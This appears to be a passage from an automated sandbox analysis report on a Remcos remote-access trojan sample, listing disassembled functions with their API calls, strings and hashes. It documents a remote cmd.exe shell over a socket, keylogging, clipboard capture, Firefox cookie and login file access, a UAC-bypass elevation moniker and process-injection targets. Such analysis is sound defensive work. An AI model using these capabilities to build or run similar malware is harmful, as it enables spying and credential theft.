                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                        • API String ID: 1067849700-181434739
                        • Opcode ID: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                        • Opcode Fuzzy Hash: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004056E6
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • __Init_thread_footer.LIBCMT ref: 00405723
                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                        • CloseHandle.KERNEL32 ref: 00405A23
                        • CloseHandle.KERNEL32 ref: 00405A2B
                        • CloseHandle.KERNEL32 ref: 00405A3D
                        • CloseHandle.KERNEL32 ref: 00405A45
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                        • API String ID: 2994406822-18413064
                        • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                        • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                        Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                        • API String ID: 3018269243-13974260
                        • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                        • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                        Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                        • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                        Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 004168C2
                        • EmptyClipboard.USER32 ref: 004168D0
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                        • CloseClipboard.USER32 ref: 00416955
                        • OpenClipboard.USER32 ref: 0041695C
                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                        • CloseClipboard.USER32 ref: 00416984
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID: !D@
                        • API String ID: 3520204547-604454484
                        • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                        • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                        Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                        • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                        Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                        • API String ID: 3756808967-1743721670
                        • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                        • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                        Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7$VG
                        • API String ID: 0-1861860590
                        • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                        • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                        Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00407521
                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Object_wcslen
                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • API String ID: 240030777-3166923314
                        • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                        • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                        Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                        • GetLastError.KERNEL32 ref: 0041A7BB
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                        • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                        Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID: lJD$lJD$lJD
                        • API String ID: 745075371-479184356
                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                        Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 1164774033-405221262
                        • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                        • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                        Function 0040A2B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                        • GetLastError.KERNEL32 ref: 0040A2ED
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                        • TranslateMessage.USER32(?), ref: 0040A34A
                        • DispatchMessageA.USER32(?), ref: 0040A355
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error $`#v
                        • API String ID: 3219506041-3226811161
                        • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                        • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                        Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                        • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                        Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$CreateFirstNext
                        • String ID: 8SG$PXG$PXG$NG$PG
                        • API String ID: 341183262-3812160132
                        • Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                        • Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                        Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 0040A416
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                        • GetKeyState.USER32(00000010), ref: 0040A433
                        • GetKeyboardState.USER32(?), ref: 0040A43E
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                        • String ID:
                        • API String ID: 1888522110-0
                        • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                        • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                        Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                        • Opcode Fuzzy Hash: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                        Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00449212
                        • _free.LIBCMT ref: 00449236
                        • _free.LIBCMT ref: 004493BD
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                        • _free.LIBCMT ref: 00449589
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                        • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                        Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
